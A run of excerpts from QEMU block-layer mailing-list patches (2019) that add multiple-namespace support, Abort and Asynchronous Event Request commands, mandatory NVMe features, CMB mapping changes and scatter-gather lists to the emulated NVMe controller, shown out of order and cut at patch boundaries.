+blk_req->blk_offset = req->slba * nvme_ns_lbads_bytes(ns);
+
+QTAILQ_INSERT_TAIL(&req->blk_req_tailq, blk_req, tailq_entry);
+
+return NVME_SUCCESS;
+}
+
+static uint16_t nvme_blk_map(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
+{
+NvmeNamespace *ns = req->ns;
+uint16_t err;
+
+uint32_t len = req->nlb * nvme_ns_lbads_bytes(ns);
+uint64_t prp1 = le64_to_cpu(cmd->prp1);
+uint64_t prp2 = le64_to_cpu(cmd->prp2);
+
+err = nvme_map_prp(n, &req->qsg, prp1, prp2, len, req);
+if (err) {
+return err;
+}
+
+err = nvme_blk_setup(n, ns, &req->qsg, req);
+if (err) {
+return err;
+}
+
+return NVME_SUCCESS;
+}
+
 static void nvme_post_cqes(void *opaque)
 {
 NvmeCQueue *cq = opaque;
@@ -388,6 +458,10 @@ static void nvme_enqueue_req_completion(NvmeCQueue *cq, 
NvmeRequest *req)
 {
 assert(cq->cqid == req->sq->cqid);
 
+if (req->qsg.nalloc) {
+qemu_sglist_destroy(&req->qsg);
+}
+
 trace_nvme_enqueue_req_completion(req->cqe.cid, cq->cqid);
 QTAILQ_REMOVE(&req->sq->out_req_list, req, entry);
 QTAILQ_INSERT_TAIL(&cq->req_list, req, entry);
@@ -471,130 +545,224 @@ static void nvme_process_aers(void *opaque)
 
 static void nvme_rw_cb(void *opaque, int ret)
 {
-NvmeRequest *req = opaque;
+NvmeBlockBackendRequest *blk_req = opaque;
+NvmeRequest *req = blk_req->req;
 NvmeSQueue *sq = req->sq;
 NvmeCtrl *n = sq->ctrl;
 NvmeCQueue *cq = n->cq[sq->cqid];
 
+QTAILQ_REMOVE(&req->blk_req_tailq, blk_req, tailq_entry);
+
+trace_nvme_rw_cb(req->cqe.cid, req->cmd.nsid);
+
 if (!ret) {
-block_acct_done(blk_get_stats(n->conf.blk), &req->acct);
-req->status = NVME_SUCCESS;
+

[Qemu-block] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Klaus Birkelund Jensen
This adds support for multiple namespaces by introducing a new 'nvme-ns'
device model. The nvme device creates a bus named from the device name
('id'). The nvme-ns devices then connect to this bus and register
themselves with the nvme device.

This changes how an nvme device is created. Example with two namespaces:

  -drive file=nvme0n1.img,if=none,id=disk1
  -drive file=nvme0n2.img,if=none,id=disk2
  -device nvme,serial=deadbeef,id=nvme0
  -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
  -device nvme-ns,drive=disk2,bus=nvme0,nsid=2

A maximum of 256 namespaces can be configured.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/Makefile.objs |   2 +-
 hw/block/nvme-ns.c | 139 +
 hw/block/nvme-ns.h |  35 +
 hw/block/nvme.c| 169 -
 hw/block/nvme.h|  29 ---
 hw/block/trace-events  |   1 +
 6 files changed, 255 insertions(+), 120 deletions(-)
 create mode 100644 hw/block/nvme-ns.c
 create mode 100644 hw/block/nvme-ns.h

diff --git a/hw/block/Makefile.objs b/hw/block/Makefile.objs
index f5f643f0cc06..d44a2f4b780d 100644
--- a/hw/block/Makefile.objs
+++ b/hw/block/Makefile.objs
@@ -7,7 +7,7 @@ common-obj-$(CONFIG_PFLASH_CFI02) += pflash_cfi02.o
 common-obj-$(CONFIG_XEN) += xen-block.o
 common-obj-$(CONFIG_ECC) += ecc.o
 common-obj-$(CONFIG_ONENAND) += onenand.o
-common-obj-$(CONFIG_NVME_PCI) += nvme.o
+common-obj-$(CONFIG_NVME_PCI) += nvme.o nvme-ns.o
 
 obj-$(CONFIG_SH4) += tc58128.o
 
diff --git a/hw/block/nvme-ns.c b/hw/block/nvme-ns.c
new file mode 100644
index ..11b594467991
--- /dev/null
+++ b/hw/block/nvme-ns.c
@@ -0,0 +1,139 @@
+#include "qemu/osdep.h"
+#include "qemu/units.h"
+#include "qemu/cutils.h"
+#include "qemu/log.h"
+#include "hw/block/block.h"
+#include "hw/pci/msix.h"
+#include "sysemu/sysemu.h"
+#include "sysemu/block-backend.h"
+#include "qapi/error.h"
+
+#include "hw/qdev-core.h"
+
+#include "nvme.h"
+#include "nvme-ns.h"
+
+static uint64_t nvme_ns_calc_blks(NvmeNamespace *ns)
+{
+return ns->size / nvme_ns_lbads_bytes(ns);
+}
+
+static void nvme_ns_init_identify(NvmeIdNs *id_ns)
+{
+id_ns->lbaf[0].ds = BDRV_SECTOR_BITS;
+}
+
+static int nvme_ns_init(NvmeNamespace *ns)
+{
+uint64_t ns_blks;
+NvmeIdNs *id_ns = &ns->id_ns;
+
+nvme_ns_init_identify(id_ns);
+
+ns_blks = nvme_ns_calc_blks(ns);
+id_ns->nuse = id_ns->ncap = id_ns->nsze = cpu_to_le64(ns_blks);
+
+return 0;
+}
+
+static int nvme_ns_init_blk(NvmeNamespace *ns, NvmeIdCtrl *id, Error **errp)
+{
+blkconf_blocksizes(&ns->conf);
+
+if (!blkconf_apply_backend_options(&ns->conf,
+blk_is_read_only(ns->conf.blk), false, errp)) {
+return 1;
+}
+
+ns->size = blk_getlength(ns->conf.blk);
+if (ns->size < 0) {
+error_setg_errno(errp, -ns->size, "blk_getlength");
+return 1;
+}
+
+if (!blk_enable_write_cache(ns->conf.blk)) {
+id->vwc = 0;
+}
+
+return 0;
+}
+
+static int nvme_ns_check_constraints(NvmeNamespace *ns, Error **errp)
+{
+if (!ns->conf.blk) {
+error_setg(errp, "nvme-ns: block backend not configured");
+return 1;
+}
+
+return 0;
+}
+
+
+static void nvme_ns_realize(DeviceState *dev, Error **errp)
+{
+NvmeNamespace *ns = NVME_NS(dev);
+BusState *s = qdev_get_parent_bus(dev);
+NvmeCtrl *n = NVME(s->parent);
+Error *local_err = NULL;
+
+if (nvme_ns_check_constraints(ns, &local_err)) {
+error_propagate_prepend(errp, local_err,
+"nvme_ns_check_constraints: ");
+return;
+}
+
+if (nvme_ns_init_blk(ns, &n->id_ctrl, &local_err)) {
+error_propagate_prepend(errp, local_err, "nvme_ns_init_blk: ");
+return;
+}
+
+nvme_ns_init(ns);
+if (nvme_register_namespace(n, ns, &local_err)) {
+error_propagate_prepend(errp, local_err, "nvme_register_namespace: ");
+return;
+}
+}
+
+static Property nvme_ns_props[] = {
+DEFINE_BLOCK_PROPERTIES(NvmeNamespace, conf),
+DEFINE_NVME_NS_PROPERTIES(NvmeNamespace, params),
+DEFINE_PROP_END_OF_LIST(),
+};
+
+static void nvme_ns_class_init(ObjectClass *oc, void *data)
+{
+DeviceClass *dc = DEVICE_CLASS(oc);
+
+set_bit(DEVICE_CATEGORY_STORAGE, dc->categories);
+
+dc->bus_type = TYPE_NVME_BUS;
+dc->realize = nvme_ns_realize;
+dc->props = nvme_ns_props;
+dc->desc = "virtual nvme namespace";
+}
+
+static void nvme_ns_instance_init(Object *obj)
+{
+NvmeNamespace *ns = NVME_NS(obj);
+char *bootindex = g_strdup_printf("/namespace@%d,0", ns->params.nsid);
+
+device_add_bootindex_property(obj, &ns->conf.bootindex, "bootindex",
+bootindex, DEVICE(obj), &error_abort);
+
+g_free(bootindex);
+}
+
+static const TypeInfo nvme_ns_info = {
+.name = TYPE_NVME_NS,
+.parent = TYPE_DEVICE,
+.class_init = nvme_ns_class_init,
+.instance_size = sizeof(NvmeNamespace),
+.instance_init = nvme_ns_instance_init,
+};
+
+static void nvme_ns_register_types(void)
+{
+   

[Qemu-block] [PATCH 13/16] nvme: simplify dma/cmb mappings

2019-07-05 Thread Klaus Birkelund Jensen
Instead of handling both QSGs and IOVs in multiple places, simply use
QSGs everywhere by assuming that the request does not involve the
controller memory buffer (CMB). If the request is found to involve the
CMB, convert the QSG to an IOV and issue the I/O. The QSG is converted
to an IOV by the dma helpers anyway, so the CMB path is not unfairly
affected by this simplifying change.

As a side-effect, this patch also allows PRPs to be located in the CMB.
The logic ensures that if some of the PRP is in the CMB, all of it must
be located there.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 277 --
 hw/block/nvme.h   |   3 +-
 hw/block/trace-events |   1 +
 include/block/nvme.h  |   1 +
 4 files changed, 187 insertions(+), 95 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 8ad95fdfa261..02888dbfdbc1 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -55,14 +55,21 @@
 
 static void nvme_process_sq(void *opaque);
 
+static inline uint8_t nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+{
+return n->cmbsz && addr >= n->ctrl_mem.addr &&
+addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size));
+}
+
 static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
 {
-if (n->cmbsz && addr >= n->ctrl_mem.addr &&
-addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
+if (nvme_addr_is_cmb(n, addr)) {
 memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
-} else {
-pci_dma_read(&n->parent_obj, addr, buf, size);
+
+return;
 }
+
+pci_dma_read(&n->parent_obj, addr, buf, size);
 }
 
 static void nvme_addr_write(NvmeCtrl *n, hwaddr addr, void *buf, int size)
@@ -151,139 +158,200 @@ static void nvme_irq_deassert(NvmeCtrl *n, NvmeCQueue 
*cq)
 }
 }
 
-static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
- uint64_t prp2, uint32_t len, NvmeCtrl *n)
+static uint16_t nvme_map_prp(NvmeCtrl *n, QEMUSGList *qsg, uint64_t prp1,
+uint64_t prp2, uint32_t len, NvmeRequest *req)
 {
 hwaddr trans_len = n->page_size - (prp1 % n->page_size);
 trans_len = MIN(len, trans_len);
 int num_prps = (len >> n->page_bits) + 1;
+uint16_t status = NVME_SUCCESS;
+bool prp_list_in_cmb = false;
+
+trace_nvme_map_prp(req->cmd.opcode, trans_len, len, prp1, prp2, num_prps);
 
 if (unlikely(!prp1)) {
 trace_nvme_err_invalid_prp();
 return NVME_INVALID_FIELD | NVME_DNR;
-} else if (n->cmbsz && prp1 >= n->ctrl_mem.addr &&
-   prp1 < n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size)) {
-qsg->nsg = 0;
-qemu_iovec_init(iov, num_prps);
-qemu_iovec_add(iov, (void *)&n->cmbuf[prp1 - n->ctrl_mem.addr], 
trans_len);
-} else {
-pci_dma_sglist_init(qsg, &n->parent_obj, num_prps);
-qemu_sglist_add(qsg, prp1, trans_len);
 }
+
+if (nvme_addr_is_cmb(n, prp1)) {
+req->is_cmb = true;
+}
+
+pci_dma_sglist_init(qsg, &n->parent_obj, num_prps);
+qemu_sglist_add(qsg, prp1, trans_len);
+
 len -= trans_len;
 if (len) {
 if (unlikely(!prp2)) {
 trace_nvme_err_invalid_prp2_missing();
+status = NVME_INVALID_FIELD | NVME_DNR;
 goto unmap;
 }
+
 if (len > n->page_size) {
 uint64_t prp_list[n->max_prp_ents];
 uint32_t nents, prp_trans;
 int i = 0;
 
+if (nvme_addr_is_cmb(n, prp2)) {
+prp_list_in_cmb = true;
+}
+
 nents = (len + n->page_size - 1) >> n->page_bits;
 prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
-nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
+nvme_addr_read(n, prp2, (void *) prp_list, prp_trans);
 while (len != 0) {
+bool addr_is_cmb;
 uint64_t prp_ent = le64_to_cpu(prp_list[i]);
 
 if (i == n->max_prp_ents - 1 && len > n->page_size) {
 if (unlikely(!prp_ent || prp_ent & (n->page_size - 1))) {
 trace_nvme_err_invalid_prplist_ent(prp_ent);
+status = NVME_INVALID_FIELD | NVME_DNR;
+goto unmap;
+}
+
+addr_is_cmb = nvme_addr_is_cmb(n, prp_ent);
+if ((prp_list_in_cmb && !addr_is_cmb) ||
+(!prp_list_in_cmb && addr_is_cmb)) {
+status = NVME_INVALID_USE_OF_CMB | NVME_DNR;
 goto unmap;
 }
 
 i = 0;
 nents = (len + n->page_size - 1) >> n->page_bits;
 prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
-nvme_addr_read(n, prp_ent, (void *)prp_list,
-prp_trans);
+nvme_addr_read(n, prp_ent, (void 

[Qemu-block] [PATCH 09/16] nvme: support Asynchronous Event Request command

2019-07-05 Thread Klaus Birkelund Jensen
Required for compliance with NVMe revision 1.2.1. See NVM Express 1.2.1,
Section 5.2 ("Asynchronous Event Request command").

Modified from Keith's qemu-nvme tree.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 88 ++-
 hw/block/nvme.h   |  7 
 hw/block/trace-events |  7 
 3 files changed, 100 insertions(+), 2 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index eb6af6508e2d..a20576654f1b 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -39,6 +39,7 @@
 #include "nvme.h"
 
 #define NVME_MAX_QS PCI_MSIX_FLAGS_QSIZE
+#define NVME_AERL 3
 #define NVME_OP_ABORTED 0xff
 #define NVME_GUEST_ERR(trace, fmt, ...) \
 do { \
@@ -318,6 +319,51 @@ static void nvme_enqueue_req_completion(NvmeCQueue *cq, 
NvmeRequest *req)
 timer_mod(cq->timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
 }
 
+static void nvme_process_aers(void *opaque)
+{
+NvmeCtrl *n = opaque;
+NvmeRequest *req;
+NvmeAerResult *result;
+NvmeAsyncEvent *event, *next;
+
+trace_nvme_process_aers();
+
+QSIMPLEQ_FOREACH_SAFE(event, &n->aer_queue, entry, next) {
+/* can't post cqe if there is nothing to complete */
+if (!n->outstanding_aers) {
+trace_nvme_no_outstanding_aers();
+break;
+}
+
+/* ignore if masked (cqe posted, but event not cleared) */
+if (n->aer_mask & (1 << event->result.event_type)) {
+trace_nvme_aer_masked(event->result.event_type, n->aer_mask);
+continue;
+}
+
+QSIMPLEQ_REMOVE_HEAD(&n->aer_queue, entry);
+
+n->aer_mask |= 1 << event->result.event_type;
+n->aer_mask_queued &= ~(1 << event->result.event_type);
+n->outstanding_aers--;
+
+req = n->aer_reqs[n->outstanding_aers];
+
+result = (NvmeAerResult *) &req->cqe.result;
+result->event_type = event->result.event_type;
+result->event_info = event->result.event_info;
+result->log_page = event->result.log_page;
+g_free(event);
+
+req->status = NVME_SUCCESS;
+
+trace_nvme_aer_post_cqe(result->event_type, result->event_info,
+result->log_page);
+
+nvme_enqueue_req_completion(&n->admin_cq, req);
+}
+}
+
 static void nvme_rw_cb(void *opaque, int ret)
 {
 NvmeRequest *req = opaque;
@@ -796,6 +842,8 @@ static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 break;
 case NVME_TIMESTAMP:
 return nvme_get_feature_timestamp(n, cmd);
+case NVME_ASYNCHRONOUS_EVENT_CONF:
+result = cpu_to_le32(n->features.async_config);
 break;
 default:
 trace_nvme_err_invalid_getfeat(dw10);
@@ -841,11 +889,11 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 req->cqe.result = cpu_to_le32((n->params.num_queues - 2) |
 ((n->params.num_queues - 2) << 16));
 break;
-
 case NVME_TIMESTAMP:
 return nvme_set_feature_timestamp(n, cmd);
+case NVME_ASYNCHRONOUS_EVENT_CONF:
+n->features.async_config = dw11;
 break;
-
 default:
 trace_nvme_err_invalid_setfeat(dw10);
 return NVME_INVALID_FIELD | NVME_DNR;
@@ -854,6 +902,22 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 return NVME_SUCCESS;
 }
 
+static uint16_t nvme_aer(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
+{
+trace_nvme_aer(req->cqe.cid);
+
+if (n->outstanding_aers > NVME_AERL) {
+trace_nvme_aer_aerl_exceeded();
+return NVME_AER_LIMIT_EXCEEDED;
+}
+
+n->aer_reqs[n->outstanding_aers] = req;
+timer_mod(n->aer_timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
+n->outstanding_aers++;
+
+return NVME_NO_COMPLETE;
+}
+
 static uint16_t nvme_abort(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
 {
 NvmeSQueue *sq;
@@ -918,6 +982,8 @@ static uint16_t nvme_admin_cmd(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 return nvme_set_feature(n, cmd, req);
 case NVME_ADM_CMD_GET_FEATURES:
 return nvme_get_feature(n, cmd, req);
+case NVME_ADM_CMD_ASYNC_EV_REQ:
+return nvme_aer(n, cmd, req);
 case NVME_ADM_CMD_ABORT:
 return nvme_abort(n, cmd, req);
 default:
@@ -963,6 +1029,7 @@ static void nvme_process_sq(void *opaque)
 
 static void nvme_clear_ctrl(NvmeCtrl *n)
 {
+NvmeAsyncEvent *event;
 int i;
 
 blk_drain(n->conf.blk);
@@ -978,8 +1045,19 @@ static void nvme_clear_ctrl(NvmeCtrl *n)
 }
 }
 
+if (n->aer_timer) {
+timer_del(n->aer_timer);
+timer_free(n->aer_timer);
+n->aer_timer = NULL;
+}
+while ((event = QSIMPLEQ_FIRST(&n->aer_queue)) != NULL) {
+QSIMPLEQ_REMOVE_HEAD(&n->aer_queue, entry);
+g_free(event);
+}
+
 blk_flush(n->conf.blk);
 n->bar.cc = 0;
+n->outstanding_aers = 0;
 }
 
 static int nvme_start_ctrl(NvmeCtrl *n)
@@ -1074,6 +1152,9 @@ static int 

[Qemu-block] [PATCH 05/16] nvme: populate the mandatory subnqn and ver fields

2019-07-05 Thread Klaus Birkelund Jensen
Required for compliance with NVMe revision 1.2.1 or later. See NVM
Express 1.2.1, Section 5.11 ("Identify command"), Figure 90 and Section
7.9 ("NVMe Qualified Names").

This also bumps the supported version to 1.2.1.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 8 +++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index ce2e5365385b..3c392dc336a8 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -1364,12 +1364,18 @@ static void nvme_realize(PCIDevice *pci_dev, Error 
**errp)
 id->ieee[0] = 0x00;
 id->ieee[1] = 0x02;
 id->ieee[2] = 0xb3;
+id->ver = cpu_to_le32(0x00010201);
 id->oacs = cpu_to_le16(0);
 id->frmw = 7 << 1;
 id->sqes = (0x6 << 4) | 0x6;
 id->cqes = (0x4 << 4) | 0x4;
 id->nn = cpu_to_le32(n->num_namespaces);
 id->oncs = cpu_to_le16(NVME_ONCS_WRITE_ZEROS | NVME_ONCS_TIMESTAMP);
+
+strcpy((char *) id->subnqn, "nqn.2014-08.org.nvmexpress:uuid:");
+qemu_uuid_unparse(_uuid,
+(char *) id->subnqn + strlen((char *) id->subnqn));
+
 id->psd[0].mp = cpu_to_le16(0x9c4);
 id->psd[0].enlat = cpu_to_le32(0x10);
 id->psd[0].exlat = cpu_to_le32(0x4);
@@ -1384,7 +1390,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 NVME_CAP_SET_CSS(n->bar.cap, 1);
 NVME_CAP_SET_MPSMAX(n->bar.cap, 4);
 
-n->bar.vs = 0x00010200;
+n->bar.vs = 0x00010201;
 n->bar.intmc = n->bar.intms = 0;
 
 if (n->params.cmb_size_mb) {
-- 
2.20.1




[Qemu-block] [PATCH 07/16] nvme: support Abort command

2019-07-05 Thread Klaus Birkelund Jensen
Required for compliance with NVMe revision 1.2.1. See NVM Express 1.2.1,
Section 5.1 ("Abort command").

Extracted from Keith's qemu-nvme tree. Modified to only consider queued
and not executing commands.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c | 56 +
 1 file changed, 56 insertions(+)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index b31e5ff681bd..4b9ff51868c0 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -38,6 +38,7 @@
 #include "trace.h"
 #include "nvme.h"
 
+#define NVME_OP_ABORTED 0xff
 #define NVME_GUEST_ERR(trace, fmt, ...) \
 do { \
 (trace_##trace)(__VA_ARGS__); \
@@ -848,6 +849,54 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 trace_nvme_err_invalid_setfeat(dw10);
 return NVME_INVALID_FIELD | NVME_DNR;
 }
+
+return NVME_SUCCESS;
+}
+
+static uint16_t nvme_abort(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
+{
+NvmeSQueue *sq;
+NvmeRequest *new;
+uint32_t index = 0;
+uint16_t sqid = cmd->cdw10 & 0xffff;
+uint16_t cid = (cmd->cdw10 >> 16) & 0xffff;
+
+req->cqe.result = 1;
+if (nvme_check_sqid(n, sqid)) {
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+sq = n->sq[sqid];
+
+/* only consider queued (and not executing) commands for abort */
+while ((sq->head + index) % sq->size != sq->tail) {
+NvmeCmd abort_cmd;
+hwaddr addr;
+
+addr = sq->dma_addr + ((sq->head + index) % sq->size) * n->sqe_size;
+
+nvme_addr_read(n, addr, (void *) &abort_cmd, sizeof(abort_cmd));
+if (abort_cmd.cid == cid) {
+req->cqe.result = 0;
+new = QTAILQ_FIRST(&sq->req_list);
+QTAILQ_REMOVE(&sq->req_list, new, entry);
+QTAILQ_INSERT_TAIL(&sq->out_req_list, new, entry);
+
+memset(&new->cqe, 0, sizeof(new->cqe));
+new->cqe.cid = cid;
+new->status = NVME_CMD_ABORT_REQ;
+
+abort_cmd.opcode = NVME_OP_ABORTED;
+nvme_addr_write(n, addr, (void *) &abort_cmd, sizeof(abort_cmd));
+
+nvme_enqueue_req_completion(n->cq[sq->cqid], new);
+
+return NVME_SUCCESS;
+}
+
+++index;
+}
+
 return NVME_SUCCESS;
 }
 
@@ -868,6 +917,8 @@ static uint16_t nvme_admin_cmd(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 return nvme_set_feature(n, cmd, req);
 case NVME_ADM_CMD_GET_FEATURES:
 return nvme_get_feature(n, cmd, req);
+case NVME_ADM_CMD_ABORT:
+return nvme_abort(n, cmd, req);
 default:
 trace_nvme_err_invalid_admin_opc(cmd->opcode);
 return NVME_INVALID_OPCODE | NVME_DNR;
@@ -890,6 +941,10 @@ static void nvme_process_sq(void *opaque)
 nvme_addr_read(n, addr, (void *)&cmd, sizeof(cmd));
 nvme_inc_sq_head(sq);
 
+if (cmd.opcode == NVME_OP_ABORTED) {
+continue;
+}
+
 req = QTAILQ_FIRST(&sq->req_list);
 QTAILQ_REMOVE(&sq->req_list, req, entry);
 QTAILQ_INSERT_TAIL(&sq->out_req_list, req, entry);
@@ -1376,6 +1431,7 @@ static void nvme_realize(PCIDevice *pci_dev, Error **errp)
 id->ieee[2] = 0xb3;
 id->ver = cpu_to_le32(0x00010201);
 id->oacs = cpu_to_le16(0);
+id->acl = 3;
 id->frmw = 7 << 1;
 id->sqes = (0x6 << 4) | 0x6;
 id->cqes = (0x4 << 4) | 0x4;
-- 
2.20.1




[Qemu-block] [PATCH 11/16] nvme: add missing mandatory Features

2019-07-05 Thread Klaus Birkelund Jensen
Add support for returning a reasonable response to Get/Set Features for
mandatory features.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 49 ---
 hw/block/trace-events |  2 ++
 include/block/nvme.h  |  3 ++-
 3 files changed, 50 insertions(+), 4 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 93f5dff197e0..8259dd7c1d6c 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -860,13 +860,24 @@ static uint16_t nvme_get_feature_timestamp(NvmeCtrl *n, 
NvmeCmd *cmd)
 static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
 {
 uint32_t dw10 = le32_to_cpu(cmd->cdw10);
+uint32_t dw11 = le32_to_cpu(cmd->cdw11);
 uint32_t result;
 
+trace_nvme_getfeat(dw10);
+
 switch (dw10) {
+case NVME_ARBITRATION:
+result = cpu_to_le32(n->features.arbitration);
+break;
+case NVME_POWER_MANAGEMENT:
+result = cpu_to_le32(n->features.power_mgmt);
+break;
 case NVME_TEMPERATURE_THRESHOLD:
 result = cpu_to_le32(n->features.temp_thresh);
 break;
 case NVME_ERROR_RECOVERY:
+result = cpu_to_le32(n->features.err_rec);
+break;
 case NVME_VOLATILE_WRITE_CACHE:
 result = blk_enable_write_cache(n->conf.blk);
 trace_nvme_getfeat_vwcache(result ? "enabled" : "disabled");
@@ -878,6 +889,19 @@ static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 break;
 case NVME_TIMESTAMP:
 return nvme_get_feature_timestamp(n, cmd);
+case NVME_INTERRUPT_COALESCING:
+result = cpu_to_le32(n->features.int_coalescing);
+break;
+case NVME_INTERRUPT_VECTOR_CONF:
+if ((dw11 & 0xffff) > n->params.num_queues) {
+return NVME_INVALID_FIELD | NVME_DNR;
+}
+
+result = cpu_to_le32(n->features.int_vector_config[dw11 & 0xffff]);
+break;
+case NVME_WRITE_ATOMICITY:
+result = cpu_to_le32(n->features.write_atomicity);
+break;
 case NVME_ASYNCHRONOUS_EVENT_CONF:
 result = cpu_to_le32(n->features.async_config);
 break;
@@ -913,6 +937,8 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 uint32_t dw10 = le32_to_cpu(cmd->cdw10);
 uint32_t dw11 = le32_to_cpu(cmd->cdw11);
 
+trace_nvme_setfeat(dw10, dw11);
+
 switch (dw10) {
 case NVME_TEMPERATURE_THRESHOLD:
 n->features.temp_thresh = dw11;
@@ -937,6 +963,13 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 case NVME_ASYNCHRONOUS_EVENT_CONF:
 n->features.async_config = dw11;
 break;
+case NVME_ARBITRATION:
+case NVME_POWER_MANAGEMENT:
+case NVME_ERROR_RECOVERY:
+case NVME_INTERRUPT_COALESCING:
+case NVME_INTERRUPT_VECTOR_CONF:
+case NVME_WRITE_ATOMICITY:
+return NVME_FEAT_NOT_CHANGABLE | NVME_DNR;
 default:
 trace_nvme_err_invalid_setfeat(dw10);
 return NVME_INVALID_FIELD | NVME_DNR;
@@ -1693,6 +1726,14 @@ static void nvme_init_state(NvmeCtrl *n)
 n->aer_reqs = g_new0(NvmeRequest *, NVME_AERL + 1);
 n->temperature = NVME_TEMPERATURE;
 n->features.temp_thresh = 0x14d;
+n->features.int_vector_config = g_malloc0_n(n->params.num_queues,
+sizeof(*n->features.int_vector_config));
+
+/* disable coalescing (not supported) */
+for (int i = 0; i < n->params.num_queues; i++) {
+n->features.int_vector_config[i] = i | (1 << 16);
+}
+
 }
 
 static void nvme_init_cmb(NvmeCtrl *n, PCIDevice *pci_dev)
@@ -1769,6 +1810,10 @@ static void nvme_init_ctrl(NvmeCtrl *n)
 id->nn = cpu_to_le32(n->num_namespaces);
 id->oncs = cpu_to_le16(NVME_ONCS_WRITE_ZEROS | NVME_ONCS_TIMESTAMP);
 
+if (blk_enable_write_cache(n->conf.blk)) {
+id->vwc = 1;
+}
+
 strcpy((char *) id->subnqn, "nqn.2014-08.org.nvmexpress:uuid:");
 qemu_uuid_unparse(_uuid,
 (char *) id->subnqn + strlen((char *) id->subnqn));
@@ -1776,9 +1821,6 @@ static void nvme_init_ctrl(NvmeCtrl *n)
 id->psd[0].mp = cpu_to_le16(0x9c4);
 id->psd[0].enlat = cpu_to_le32(0x10);
 id->psd[0].exlat = cpu_to_le32(0x4);
-if (blk_enable_write_cache(n->conf.blk)) {
-id->vwc = 1;
-}
 
 n->bar.cap = 0;
 NVME_CAP_SET_MQES(n->bar.cap, 0x7ff);
@@ -1876,6 +1918,7 @@ static void nvme_exit(PCIDevice *pci_dev)
 g_free(n->sq);
 g_free(n->elpes);
 g_free(n->aer_reqs);
+g_free(n->features.int_vector_config);
 
 if (n->params.cmb_size_mb) {
 g_free(n->cmbuf);
diff --git a/hw/block/trace-events b/hw/block/trace-events
index ed666bbc94f2..17485bb0375b 100644
--- a/hw/block/trace-events
+++ b/hw/block/trace-events
@@ -41,6 +41,8 @@ nvme_del_cq(uint16_t cqid) "deleted completion queue, 
sqid=%"PRIu16""
 nvme_identify_ctrl(void) "identify controller"
 nvme_identify_ns(uint16_t ns) "identify namespace, nsid=%"PRIu16""
 nvme_identify_nslist(uint16_t ns) "identify 

[Qemu-block] [PATCH 15/16] nvme: support scatter gather lists

2019-07-05 Thread Klaus Birkelund Jensen
For now, support the Data Block, Segment and Last Segment descriptor
types.

See NVM Express 1.3d, Section 4.4 ("Scatter Gather List (SGL)").

Signed-off-by: Klaus Birkelund Jensen 
---
 block/nvme.c  |  18 +-
 hw/block/nvme.c   | 390 +++---
 hw/block/nvme.h   |   6 +
 hw/block/trace-events |   3 +
 include/block/nvme.h  |  64 ++-
 5 files changed, 410 insertions(+), 71 deletions(-)

diff --git a/block/nvme.c b/block/nvme.c
index 73ed5fa75f2e..907a610633f2 100644
--- a/block/nvme.c
+++ b/block/nvme.c
@@ -438,7 +438,7 @@ static void nvme_identify(BlockDriverState *bs, int 
namespace, Error **errp)
 error_setg(errp, "Cannot map buffer for DMA");
 goto out;
 }
-cmd.prp1 = cpu_to_le64(iova);
+cmd.dptr.prp.prp1 = cpu_to_le64(iova);
 
 if (nvme_cmd_sync(bs, s->queues[0], &cmd)) {
 error_setg(errp, "Failed to identify controller");
@@ -512,7 +512,7 @@ static bool nvme_add_io_queue(BlockDriverState *bs, Error 
